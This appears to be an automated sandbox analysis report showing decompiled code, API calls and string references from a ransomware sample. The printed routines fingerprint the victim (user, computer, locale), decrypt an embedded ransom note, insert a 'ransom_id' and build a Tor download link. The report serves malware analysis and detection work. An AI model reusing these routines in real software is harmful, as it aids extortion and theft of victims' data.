Opcode Fuzzy Hash: 7e57712194f371cfb1094e5f737bd10b1a0b48f61542011f47c96f80116019c1
Instruction Fuzzy Hash: 6021D732A48219BBEF209E98DC81FFEB7BCEB44711F0001A6FE04D7180D775A9159BA0

Uniqueness

Uniqueness Score: -1.00%

Function 0F697E40 Relevance: 98.1, APIs: 2, Strings: 54, Instructions: 88
networkCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0F697E40(void* __ecx) {
				short _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				intOrPtr _v28;
				intOrPtr _v32;
				intOrPtr _v36;
				intOrPtr _v40;
				intOrPtr _v44;
				intOrPtr _v48;
				intOrPtr _v52;
				intOrPtr _v56;
				intOrPtr _v60;
				intOrPtr _v64;
				intOrPtr _v68;
				intOrPtr _v72;
				intOrPtr _v76;
				intOrPtr _v80;
				intOrPtr _v84;
				intOrPtr _v88;
				intOrPtr _v92;
				intOrPtr _v96;
				intOrPtr _v100;
				intOrPtr _v104;
				intOrPtr _v108;
				intOrPtr _v112;
				intOrPtr _v116;
				intOrPtr _v120;
				intOrPtr _v124;
				intOrPtr _v128;
				intOrPtr _v132;
				intOrPtr _v136;
				intOrPtr _v140;
				intOrPtr _v144;
				intOrPtr _v148;
				intOrPtr _v152;
				intOrPtr _v156;
				intOrPtr _v160;
				intOrPtr _v164;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				intOrPtr _v192;
				intOrPtr _v196;
				intOrPtr _v200;
				intOrPtr _v204;
				intOrPtr _v208;
				intOrPtr _v212;
				intOrPtr _v216;
				intOrPtr _v220;
				short _v224;
				WCHAR* _t62;
				void* _t64;

				_v8 = 0;
				_v224 = 0x6f004d;
				_v220 = 0x69007a;
				_v216 = 0x6c006c;
				_v212 = 0x2f0061;
				_v208 = 0x2e0035;
				_v204 = 0x200030;
				_v200 = 0x570028;
				_v196 = 0x6e0069;
				_v192 = 0x6f0064;
				_v188 = 0x730077;
				_v184 = 0x4e0020;
				_v180 = 0x200054;
				_v176 = 0x2e0036;
				_v172 = 0x3b0031;
				_v168 = 0x570020;
				_v164 = 0x57004f;
				_v160 = 0x340036;
				_v156 = 0x200029;
				_v152 = 0x700041;
				_v148 = 0x6c0070;
				_v144 = 0x570065;
				_v140 = 0x620065;
				_v136 = 0x69004b;
				_v132 = 0x2f0074;
				_v128 = 0x330035;
				_v124 = 0x2e0037;
				_v120 = 0x360033;
				_v116 = 0x280020;
				_v112 = 0x48004b;
				_v108 = 0x4d0054;
				_v104 = 0x2c004c;
				_v100 = 0x6c0020;
				_v96 = 0x6b0069;
				_v92 = 0x200065;
				_v88 = 0x650047;
				_v84 = 0x6b0063;
				_v80 = 0x29006f;
				_v76 = 0x430020;
				_v72 = 0x720068;
				_v68 = 0x6d006f;
				_v64 = 0x2f0065;
				_v60 = 0x350035;
				_v56 = 0x30002e;
				_v52 = 0x32002e;
				_v48 = 0x380038;
				_v44 = 0x2e0033;
				_v40 = 0x370038;
				_v36 = 0x530020;
				_v32 = 0x660061;
				_v28 = 0x720061;
				_v24 = 0x2f0069;
				_v20 = 0x330035;
				_v16 = 0x2e0037;
				_v12 = 0x360033;
				_t62 = InternetOpenW( &_v224, 0, 0, 0, 0); // executed
				 *(__ecx + 4) = _t62;
				if(_t62 == 0) {
					_t64 = InternetOpenW( &_v224, 1, _t62, _t62, 0x10000000);
					 *(__ecx + 4) = _t64;
					return _t64;
				}
				return _t62;
			}

0x0f697e58
0x0f697e64
0x0f697e6f
0x0f697e79
0x0f697e83
0x0f697e8d
0x0f697e97
0x0f697ea1
0x0f697eab
0x0f697eb5
0x0f697ebf
0x0f697ec9
0x0f697ed3
0x0f697edd
0x0f697ee7
0x0f697ef1
0x0f697efb
0x0f697f05
0x0f697f0f
0x0f697f19
0x0f697f23
0x0f697f2d
0x0f697f37
0x0f697f41
0x0f697f4b
0x0f697f52
0x0f697f59
0x0f697f60
0x0f697f67
0x0f697f6e
0x0f697f75
0x0f697f7c
0x0f697f83
0x0f697f8a
0x0f697f91
0x0f697f98
0x0f697f9f
0x0f697fa6
0x0f697fad
0x0f697fb4
0x0f697fbb
0x0f697fc2
0x0f697fc9
0x0f697fd0
0x0f697fd7
0x0f697fde
0x0f697fe5
0x0f697fec
0x0f697ff3
0x0f697ffa
0x0f698001
0x0f698008
0x0f69800f
0x0f698016
0x0f69801d
0x0f698024
0x0f698026
0x0f69802b
0x0f69803d
0x0f69803f
0x00000000
0x0f69803f
0x0f698048

APIs

InternetOpenW.WININET(?,00000000,00000000,00000000,00000000), ref: 0F698024
InternetOpenW.WININET(006F004D,00000001,00000000,00000000,10000000), ref: 0F69803D

Strings

t, xrefs: 0F697F4B
a, xrefs: 0F698001
e, xrefs: 0F697F37
7, xrefs: 0F698016
3, xrefs: 0F697FE5
O, xrefs: 0F697EFB
, xrefs: 0F697FF3
G, xrefs: 0F697F98
), xrefs: 0F697F0F
, xrefs: 0F697EF1
1, xrefs: 0F697EE7
o, xrefs: 0F697FA6
M, xrefs: 0F697E64
K, xrefs: 0F697F41
c, xrefs: 0F697F9F
3, xrefs: 0F697F60
5, xrefs: 0F697E8D
a, xrefs: 0F697E83
, xrefs: 0F697F83
8, xrefs: 0F697FDE
T, xrefs: 0F697ED3
3, xrefs: 0F69801D
e, xrefs: 0F697F91
K, xrefs: 0F697F6E
6, xrefs: 0F697EDD
(, xrefs: 0F697EA1
p, xrefs: 0F697F23
i, xrefs: 0F697F8A
a, xrefs: 0F697FFA
i, xrefs: 0F697EAB
l, xrefs: 0F697E79
o, xrefs: 0F697FBB
z, xrefs: 0F697E6F
h, xrefs: 0F697FB4
5, xrefs: 0F697F52
A, xrefs: 0F697F19
8, xrefs: 0F697FEC
., xrefs: 0F697FD0
0, xrefs: 0F697E97
T, xrefs: 0F697F75
, xrefs: 0F697F67
6, xrefs: 0F697F05
5, xrefs: 0F69800F
L, xrefs: 0F697F7C
e, xrefs: 0F697FC2
., xrefs: 0F697FD7
5, xrefs: 0F697FC9
, xrefs: 0F697FAD
i, xrefs: 0F698008
, xrefs: 0F697EC9
d, xrefs: 0F697EB5
w, xrefs: 0F697EBF
e, xrefs: 0F697F2D
7, xrefs: 0F697F59

Memory Dump Source

Source File: 00000000.00000002.281242346.000000000F691000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F690000, based on PE: true

Associated: 00000000.00000002.281238581.000000000F690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281249119.000000000F69A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281255332.000000000F6A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281260270.000000000F6A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f690000_mPNVrHIpyt.jbxd

Yara matches

Similarity

API ID: InternetOpen
String ID: $ $ $ $ $ $($)$.$.$0$1$3$3$3$5$5$5$5$6$6$7$7$8$8$A$G$K$K$L$M$O$T$T$a$a$a$c$d$e$e$e$e$h$i$i$i$l$o$o$p$t$w$z
API String ID: 2038078732-2805935662
Opcode ID: e8510b3cf3361e25c6eb8aa67f649fb819529618e0173f58ed4177b933cd37a8
Instruction ID: e0e10accb5424bb162d4e062074fc2d4e4e55487f00daa18dc15e5781124001c
Opcode Fuzzy Hash: e8510b3cf3361e25c6eb8aa67f649fb819529618e0173f58ed4177b933cd37a8
Instruction Fuzzy Hash: 7B41A8B4811358DEEB25CF91999879EBFF5FB04748F50819ED5086B201C7F60A89CF64

Uniqueness

Uniqueness Score: -1.00%

Function 0F6970A0 Relevance: 89.4, APIs: 49, Strings: 2, Instructions: 196
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 100%

			E0F6970A0(intOrPtr* __ecx, WCHAR* _a4) {
				WCHAR* _t47;
				intOrPtr* _t91;
				intOrPtr _t94;
				WCHAR* _t96;

				_t91 = __ecx;
				_t96 = _a4;
				if( *((intOrPtr*)(__ecx + 0x80)) != 0) {
					lstrcatW(_t96,  *(__ecx + 0x88));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x84));
					lstrcatW(_t96, "&");
				}
				if( *_t91 != 0) {
					lstrcatW(_t96,  *(_t91 + 4));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 8));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0xc)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x10));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x14));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x18)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x1c));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x20));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x24)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x28));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x2c));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x30)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x34));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x38));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x3c)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x40));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x44));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x48)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x4c));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x50));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x54)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x58));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x5c));
					lstrcatW(_t96, "&");
				}
				if( *((intOrPtr*)(_t91 + 0x60)) != 0) {
					_t47 = VirtualAlloc(0, 0x42, 0x3000, 0x40); // executed
					_t94 =  *((intOrPtr*)(_t91 + 0x6c));
					_a4 = _t47;
					if(_t94 == 0) {
						wsprintfW(_t47, L"undefined");
					} else {
						wsprintfW(_t47, L"%x%x", _t94,  *((intOrPtr*)(_t91 + 0x70)));
					}
					lstrcatW(_t96,  *(_t91 + 0x64));
					lstrcatW(_t96, "=");
					lstrcatW(_t96, _a4);
					lstrcatW(_t96, "&");
					VirtualFree(_a4, 0, 0x8000); // executed
				}
				if( *((intOrPtr*)(_t91 + 0x74)) != 0) {
					lstrcatW(_t96,  *(_t91 + 0x78));
					lstrcatW(_t96, "=");
					lstrcatW(_t96,  *(_t91 + 0x7c));
					lstrcatW(_t96, "&");
				}
				 *((short*)(_t96 + lstrlenW(_t96) * 2 - 2)) = 0;
				return _t96;
			}

0x0f6970a4
0x0f6970a7
0x0f6970b8
0x0f6970c1
0x0f6970c9
0x0f6970d2
0x0f6970da
0x0f6970da
0x0f6970df
0x0f6970e5
0x0f6970ed
0x0f6970f3
0x0f6970fb
0x0f6970fb
0x0f697101
0x0f697107
0x0f69710f
0x0f697115
0x0f69711d
0x0f69711d
0x0f697123
0x0f697129
0x0f697131
0x0f697137
0x0f69713f
0x0f69713f
0x0f697145
0x0f69714b
0x0f697153
0x0f697159
0x0f697161
0x0f697161
0x0f697167
0x0f69716d
0x0f697175
0x0f69717b
0x0f697183
0x0f697183
0x0f697189
0x0f69718f
0x0f697197
0x0f69719d
0x0f6971a5
0x0f6971a5
0x0f6971ab
0x0f6971b1
0x0f6971b9
0x0f6971bf
0x0f6971c7
0x0f6971c7
0x0f6971cd
0x0f6971d3
0x0f6971db
0x0f6971e1
0x0f6971e9
0x0f6971e9
0x0f6971ef
0x0f6971fc
0x0f697202
0x0f697205
0x0f69720a
0x0f697227
0x0f69720c
0x0f697216
0x0f69721c
0x0f697234
0x0f69723c
0x0f697242
0x0f69724a
0x0f697256
0x0f697256
0x0f697260
0x0f697266
0x0f69726e
0x0f697274
0x0f69727c
0x0f69727c
0x0f697288
0x0f697292

APIs

lstrcatW.KERNEL32(?,?), ref: 0F6970C1
lstrcatW.KERNEL32(?,0F69FFD0), ref: 0F6970C9
lstrcatW.KERNEL32(?,?), ref: 0F6970D2
lstrcatW.KERNEL32(?,0F69FFD4), ref: 0F6970DA
lstrcatW.KERNEL32(?,?), ref: 0F6970E5
lstrcatW.KERNEL32(?,0F69FFD0), ref: 0F6970ED
lstrcatW.KERNEL32(?,?), ref: 0F6970F3
lstrcatW.KERNEL32(?,0F69FFD4), ref: 0F6970FB
lstrcatW.KERNEL32(?,?), ref: 0F697107
lstrcatW.KERNEL32(?,0F69FFD0), ref: 0F69710F
lstrcatW.KERNEL32(?,?), ref: 0F697115
lstrcatW.KERNEL32(?,0F69FFD4), ref: 0F69711D
lstrcatW.KERNEL32(?,?), ref: 0F697129
lstrcatW.KERNEL32(?,0F69FFD0), ref: 0F697131
lstrcatW.KERNEL32(?,?), ref: 0F697137
lstrcatW.KERNEL32(?,0F69FFD4), ref: 0F69713F
lstrcatW.KERNEL32(?,?), ref: 0F69714B
lstrcatW.KERNEL32(?,0F69FFD0), ref: 0F697153
lstrcatW.KERNEL32(?,?), ref: 0F697159
lstrcatW.KERNEL32(?,0F69FFD4), ref: 0F697161
lstrcatW.KERNEL32(?,?), ref: 0F69716D
lstrcatW.KERNEL32(?,0F69FFD0), ref: 0F697175
lstrcatW.KERNEL32(?,?), ref: 0F69717B
lstrcatW.KERNEL32(?,0F69FFD4), ref: 0F697183
lstrcatW.KERNEL32(?,0F694B36), ref: 0F69718F
lstrcatW.KERNEL32(?,0F69FFD0), ref: 0F697197
lstrcatW.KERNEL32(?,?), ref: 0F69719D
lstrcatW.KERNEL32(?,0F69FFD4), ref: 0F6971A5
lstrcatW.KERNEL32(?,?), ref: 0F6971B1
lstrcatW.KERNEL32(?,0F69FFD0), ref: 0F6971B9
lstrcatW.KERNEL32(?,?), ref: 0F6971BF
lstrcatW.KERNEL32(?,0F69FFD4), ref: 0F6971C7
lstrcatW.KERNEL32(?,?), ref: 0F6971D3
lstrcatW.KERNEL32(?,0F69FFD0), ref: 0F6971DB
lstrcatW.KERNEL32(?,?), ref: 0F6971E1
lstrcatW.KERNEL32(?,0F69FFD4), ref: 0F6971E9
VirtualAlloc.KERNEL32(00000000,00000042,00003000,00000040,00000000,00000000,?,?,0F694869,00000000,?,00003000,00000040,00000000,?,00000000), ref: 0F6971FC
wsprintfW.USER32 ref: 0F697216
wsprintfW.USER32 ref: 0F697227
lstrcatW.KERNEL32(?,?), ref: 0F697234
lstrcatW.KERNEL32(?,0F69FFD0), ref: 0F69723C
lstrcatW.KERNEL32(?,?), ref: 0F697242
lstrcatW.KERNEL32(?,0F69FFD4), ref: 0F69724A
VirtualFree.KERNELBASE(?,00000000,00008000,?,00000000,00000000,?,00000000), ref: 0F697256
lstrcatW.KERNEL32(?,?), ref: 0F697266
lstrcatW.KERNEL32(?,0F69FFD0), ref: 0F69726E
lstrcatW.KERNEL32(?,?), ref: 0F697274
lstrcatW.KERNEL32(?,0F69FFD4), ref: 0F69727C
lstrlenW.KERNEL32(?,00000000,00000000,?,?,0F694869,00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F69727F

Strings

%x%x, xrefs: 0F697210
undefined, xrefs: 0F697221

Memory Dump Source

Source File: 00000000.00000002.281242346.000000000F691000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F690000, based on PE: true

Associated: 00000000.00000002.281238581.000000000F690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281249119.000000000F69A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281255332.000000000F6A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281260270.000000000F6A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f690000_mPNVrHIpyt.jbxd

Yara matches

Similarity

API ID: lstrcat$Virtualwsprintf$AllocFreelstrlen
String ID: %x%x$undefined
API String ID: 3872469520-3801831566
Opcode ID: 78c5b48fbd562f3f1271153ab67a7821b0257e1f3eb3ca4171dc685c2af50a82
Instruction ID: abec7d83cfe1f16f70575e86695462abfe00d31d3d585e1020bac3c65689a8be
Opcode Fuzzy Hash: 78c5b48fbd562f3f1271153ab67a7821b0257e1f3eb3ca4171dc685c2af50a82
Instruction Fuzzy Hash: CC512B3114AA68BACF273F618C49FDF3A5DEFC6701F070051F9105905B8B699252EFAA

Uniqueness

Uniqueness Score: -1.00%

Function 0F6942B0 Relevance: 66.7, APIs: 7, Strings: 31, Instructions: 175
stringmemoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

C-Code - Quality: 49%

			E0F6942B0(void* __ecx, void* __edx) {
				char _v148;
				char _v152;
				WCHAR* _v156;
				void* _v160;
				intOrPtr _v168;
				intOrPtr _v172;
				intOrPtr _v176;
				intOrPtr _v180;
				intOrPtr _v184;
				intOrPtr _v188;
				intOrPtr _v192;
				intOrPtr _v196;
				intOrPtr _v200;
				intOrPtr _v204;
				intOrPtr _v208;
				intOrPtr _v212;
				intOrPtr _v216;
				intOrPtr _v220;
				intOrPtr _v224;
				intOrPtr _v228;
				intOrPtr _v232;
				char _v236;
				intOrPtr _v240;
				void* _v244;
				intOrPtr _v248;
				intOrPtr _v252;
				intOrPtr _v256;
				intOrPtr _v260;
				intOrPtr _v264;
				intOrPtr _v268;
				intOrPtr _v272;
				intOrPtr _v276;
				char _v280;
				void* _t54;
				void* _t58;
				void* _t60;
				signed int _t61;
				void* _t62;
				WCHAR* _t65;
				signed short _t69;
				signed short* _t70;
				WCHAR* _t77;
				signed int _t82;
				signed int _t83;
				void* _t87;
				void* _t90;
				long _t93;
				WCHAR* _t94;
				signed int _t97;
				void* _t98;
				WCHAR* _t100;
				void* _t102;

				if( *0xf6a2a64 != 0) {
					L24:
					return _t54;
				}
				_push(__ecx);
				_push(0);
				_push(__ecx);
				_push(0);
				_push(0);
				_push(__ecx);
				_push(0);
				_push(__ecx);
				_push(0);
				_push(__ecx);
				_push(0);
				_push(__ecx);
				_push(0);
				_push(0);
				_push(__ecx);
				_push(0);
				E0F693BC0( &_v148);
				E0F697490( &_v236, __edx); // executed
				_t97 = E0F6972A0( &_v236);
				_t93 = 0x42 + _t97 * 2;
				_t58 = VirtualAlloc(0, _t93, 0x3000, 0x40); // executed
				_v244 = _t58;
				if(_t58 == 0 || 0x40 + _t97 * 2 >= _t93) {
					_t98 = 0;
				} else {
					_t98 = _t58;
				}
				E0F6970A0( &_v152, _t98); // executed
				_t60 = E0F6981F0(_t98, L"ransom_id=");
				_t61 = lstrlenW(L"ransom_id=");
				asm("movdqa xmm1, [0xf6a0510]");
				_t77 = 0xf6a2000;
				_t87 = 0xa3;
				_t100 = _t60 + _t61 * 2;
				_t62 = 0xa30;
				_v160 = _t100;
				do {
					_t13 =  &(_t77[8]); // 0x44004e
					_t77 = _t13;
					asm("movdqu xmm0, [ecx-0x10]");
					asm("pxor xmm0, xmm1");
					asm("movdqu [ecx-0x10], xmm0");
					_t87 = _t87 - 1;
				} while (_t87 != 0);
				do {
					 *(_t62 + 0xf6a2000) =  *(_t62 + 0xf6a2000) ^ 0x00000005;
					_t62 = _t62 + 1;
				} while (_t62 < 0xa38);
				 *0xf6a2a64 = 0xf6a2000;
				_t94 = E0F6981F0(0xf6a2000, L"{USERID}");
				if(_t94 == 0) {
					L20:
					_v280 = 0x740068;
					_v276 = 0x700074;
					_v272 = 0x3a0073;
					_v268 = 0x2f002f;
					_v264 = 0x770077;
					_v260 = 0x2e0077;
					_v256 = 0x6f0074;
					_v252 = 0x700072;
					_v248 = 0x6f0072;
					_v244 = 0x65006a;
					_v240 = 0x740063;
					_v236 = 0x6f002e;
					_v232 = 0x670072;
					_v228 = 0x64002f;
					_v224 = 0x77006f;
					_v220 = 0x6c006e;
					_v216 = 0x61006f;
					_v212 = 0x2f0064;
					_v208 = 0x6f0064;
					_v204 = 0x6e0077;
					_v200 = 0x6f006c;
					_v196 = 0x640061;
					_v192 = 0x65002d;
					_v188 = 0x730061;
					_v184 = 0x2e0079;
					_v180 = 0x740068;
					_v176 = 0x6c006d;
					_v172 = 0x65002e;
					_v168 = 0x6e;
					if( *0xf6a2a44 == 0) {
						_t65 = VirtualAlloc(0, 0x400, 0x3000, 4); // executed
						 *0xf6a2a44 = _t65;
						if(_t65 != 0) {
							wsprintfW(_t65, L"%s",  &_v280);
						}
					}
					VirtualFree(_v160, 0, 0x8000); // executed
					_t54 = E0F697D70( &_v152);
					goto L24;
				}
				while(1) {
					L11:
					lstrcpyW(_t94, _t100);
					_t94[lstrlenW(_t94)] = 0x20;
					_t94 = 0xf6a2000;
					_t69 =  *0xf6a2000; // 0xfeff
					if(_t69 == 0) {
						goto L20;
					}
					_t82 = _t69 & 0x0000ffff;
					_t102 = 0xf6a2000 - L"{USERID}";
					do {
						_t70 = L"{USERID}";
						if(_t82 == 0) {
							goto L19;
						}
						while(1) {
							_t83 =  *_t70 & 0x0000ffff;
							if(_t83 == 0) {
								break;
							}
							_t90 = ( *(_t102 + _t70) & 0x0000ffff) - _t83;
							if(_t90 != 0) {
								L18:
								if( *_t70 == 0) {
									break;
								}
								goto L19;
							}
							_t70 =  &(_t70[1]);
							if( *(_t102 + _t70) != _t90) {
								continue;
							}
							goto L18;
						}
						_t100 = _v156;
						goto L11;
						L19:
						_t20 =  &(_t94[1]); // 0x2d002d
						_t82 =  *_t20 & 0x0000ffff;
						_t94 =  &(_t94[1]);
						_t102 = _t102 + 2;
					} while (_t82 != 0);
					goto L20;
				}
				goto L20;
			}

0x0f6942c5
0x0f694598
0x0f69459d
0x0f69459d
0x0f6942cb
0x0f6942cc
0x0f6942ce
0x0f6942cf
0x0f6942d4
0x0f6942d6
0x0f6942d7
0x0f6942d9
0x0f6942da
0x0f6942dc
0x0f6942dd
0x0f6942df
0x0f6942e0
0x0f6942e5
0x0f6942e7
0x0f6942e8
0x0f6942f1
0x0f6942fd
0x0f69430e
0x0f694317
0x0f694321
0x0f694327
0x0f694330
0x0f694341
0x0f69433d
0x0f69433d
0x0f69433d
0x0f69434b
0x0f694357
0x0f694363
0x0f694369
0x0f694371
0x0f694376
0x0f69437b
0x0f69437e
0x0f694383
0x0f694390
0x0f694390
0x0f694390
0x0f694393
0x0f694398
0x0f69439c
0x0f6943a1
0x0f6943a1
0x0f6943b0
0x0f6943b0
0x0f6943b7
0x0f6943b8
0x0f6943c4
0x0f6943d8
0x0f6943dc
0x0f694456
0x0f69445d
0x0f694465
0x0f69446d
0x0f694475
0x0f69447d
0x0f694485
0x0f69448d
0x0f694495
0x0f69449d
0x0f6944a5
0x0f6944ad
0x0f6944b5
0x0f6944bd
0x0f6944c5
0x0f6944cd
0x0f6944d5
0x0f6944dd
0x0f6944e5
0x0f6944ed
0x0f6944f5
0x0f6944fd
0x0f694505
0x0f69450d
0x0f694515
0x0f69451d
0x0f694525
0x0f69452d
0x0f694535
0x0f69453d
0x0f694545
0x0f694555
0x0f69455b
0x0f694562
0x0f69456f
0x0f694575
0x0f694562
0x0f694586
0x0f694593
0x00000000
0x0f694593
0x0f6943e0
0x0f6943e0
0x0f6943e2
0x0f6943f4
0x0f6943f8
0x0f6943fd
0x0f694406
0x00000000
0x00000000
0x0f69440a
0x0f69440d
0x0f694413
0x0f694413
0x0f69441b
0x00000000
0x00000000
0x0f694420
0x0f694420
0x0f694426
0x00000000
0x00000000
0x0f694430
0x0f694432
0x0f69443d
0x0f694441
0x00000000
0x00000000
0x00000000
0x0f694441
0x0f694434
0x0f69443b
0x00000000
0x00000000
0x00000000
0x0f69443b
0x0f69459e
0x00000000
0x0f694447
0x0f694447
0x0f694447
0x0f69444b
0x0f69444e
0x0f694451
0x00000000
0x0f694413
0x00000000

APIs

Part of subcall function 0F693BC0: GetProcessHeap.KERNEL32(?,?,0F694807,00000000,?,00000000,00000000), ref: 0F693C5C

Part of subcall function 0F697490: VirtualAlloc.KERNEL32(00000000,00000202,00003000,00000004), ref: 0F6974B7
Part of subcall function 0F697490: GetUserNameW.ADVAPI32(00000000,?), ref: 0F6974C8
Part of subcall function 0F697490: VirtualAlloc.KERNEL32(00000000,00000020,00003000,00000004), ref: 0F6974E6
Part of subcall function 0F697490: GetComputerNameW.KERNEL32 ref: 0F6974F0
Part of subcall function 0F697490: VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 0F697510
Part of subcall function 0F697490: wsprintfW.USER32 ref: 0F697551
Part of subcall function 0F697490: VirtualAlloc.KERNEL32(00000000,00000080,00003000,00000004), ref: 0F69756E
Part of subcall function 0F697490: RegOpenKeyExW.KERNEL32(80000001,Control Panel\International,00000000,00020019,00000000), ref: 0F697592
Part of subcall function 0F697490: RegQueryValueExW.KERNEL32(00000000,LocaleName,00000000,00000000,0F694810,?), ref: 0F6975B6
Part of subcall function 0F697490: RegCloseKey.KERNEL32(00000000), ref: 0F6975D2

Part of subcall function 0F6972A0: lstrlenW.KERNEL32(?,?,?,?,0F694819,00000000,?,00000000,00000000,?,00000000), ref: 0F6972F2
Part of subcall function 0F6972A0: lstrlenW.KERNEL32(?,?,?,?,0F694819,00000000,?,00000000,00000000,?,00000000), ref: 0F6972FD
Part of subcall function 0F6972A0: lstrlenW.KERNEL32(?,?,?,?,0F694819,00000000,?,00000000,00000000,?,00000000), ref: 0F697313
Part of subcall function 0F6972A0: lstrlenW.KERNEL32(?,?,?,?,0F694819,00000000,?,00000000,00000000,?,00000000), ref: 0F69731E
Part of subcall function 0F6972A0: lstrlenW.KERNEL32(?,?,?,?,0F694819,00000000,?,00000000,00000000,?,00000000), ref: 0F697334
Part of subcall function 0F6972A0: lstrlenW.KERNEL32(?,?,?,?,0F694819,00000000,?,00000000,00000000,?,00000000), ref: 0F69733F
Part of subcall function 0F6972A0: lstrlenW.KERNEL32(?,?,?,?,0F694819,00000000,?,00000000,00000000,?,00000000), ref: 0F697355
Part of subcall function 0F6972A0: lstrlenW.KERNEL32(0F694B36,?,?,?,0F694819,00000000,?,00000000,00000000,?,00000000), ref: 0F697360
Part of subcall function 0F6972A0: lstrlenW.KERNEL32(?,?,?,?,0F694819,00000000,?,00000000,00000000,?,00000000), ref: 0F697376
Part of subcall function 0F6972A0: lstrlenW.KERNEL32(?,?,?,?,0F694819,00000000,?,00000000,00000000,?,00000000), ref: 0F697381
Part of subcall function 0F6972A0: lstrlenW.KERNEL32(?,?,?,?,0F694819,00000000,?,00000000,00000000,?,00000000), ref: 0F697397
Part of subcall function 0F6972A0: lstrlenW.KERNEL32(?,?,?,?,0F694819,00000000,?,00000000,00000000,?,00000000), ref: 0F6973A2
Part of subcall function 0F6972A0: lstrlenW.KERNEL32(?,?,?,?,0F694819,00000000,?,00000000,00000000,?,00000000), ref: 0F6973C1
Part of subcall function 0F6972A0: lstrlenW.KERNEL32(?,?,?,?,0F694819,00000000,?,00000000,00000000,?,00000000), ref: 0F6973CC

VirtualAlloc.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F694321
lstrlenW.KERNEL32(ransom_id=,00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F694363
lstrcpyW.KERNEL32 ref: 0F6943E2
lstrlenW.KERNEL32(00000000,?,00003000,00000040,00000000,?,00000000,00000000,?,00000000), ref: 0F6943E9

Strings

h, xrefs: 0F69445D
o, xrefs: 0F6944CD
a, xrefs: 0F694505
r, xrefs: 0F694495
n, xrefs: 0F6944D5
/, xrefs: 0F694475
., xrefs: 0F694535
w, xrefs: 0F6944F5
t, xrefs: 0F69448D
s, xrefs: 0F69446D
y, xrefs: 0F69451D
j, xrefs: 0F6944A5
c, xrefs: 0F6944AD
t, xrefs: 0F694465
l, xrefs: 0F6944FD
w, xrefs: 0F69447D
d, xrefs: 0F6944ED
{USERID}, xrefs: 0F6943BF, 0F69440D, 0F694413
a, xrefs: 0F694515
n, xrefs: 0F69453D
ransom_id=, xrefs: 0F694350, 0F69435C
h, xrefs: 0F694525
-, xrefs: 0F69450D
r, xrefs: 0F69449D
., xrefs: 0F6944B5
d, xrefs: 0F6944E5
m, xrefs: 0F69452D
/, xrefs: 0F6944C5
w, xrefs: 0F694485
r, xrefs: 0F6944BD
o, xrefs: 0F6944DD

Memory Dump Source

Source File: 00000000.00000002.281242346.000000000F691000.00000020.00000001.01000000.00000003.sdmp, Offset: 0F690000, based on PE: true

Associated: 00000000.00000002.281238581.000000000F690000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281249119.000000000F69A000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281255332.000000000F6A2000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.281260270.000000000F6A4000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_f690000_mPNVrHIpyt.jbxd

Yara matches

Similarity

API ID: lstrlen$AllocVirtual$Name$CloseComputerHeapOpenProcessQueryUserValuelstrcpywsprintf
String ID: -$.$.$/$/$a$a$c$d$d$h$h$j$l$m$n$n$o$o$r$r$r$ransom_id=$s$t$t$w$w$w$y${USERID}
API String ID: 4100118565-2385900546
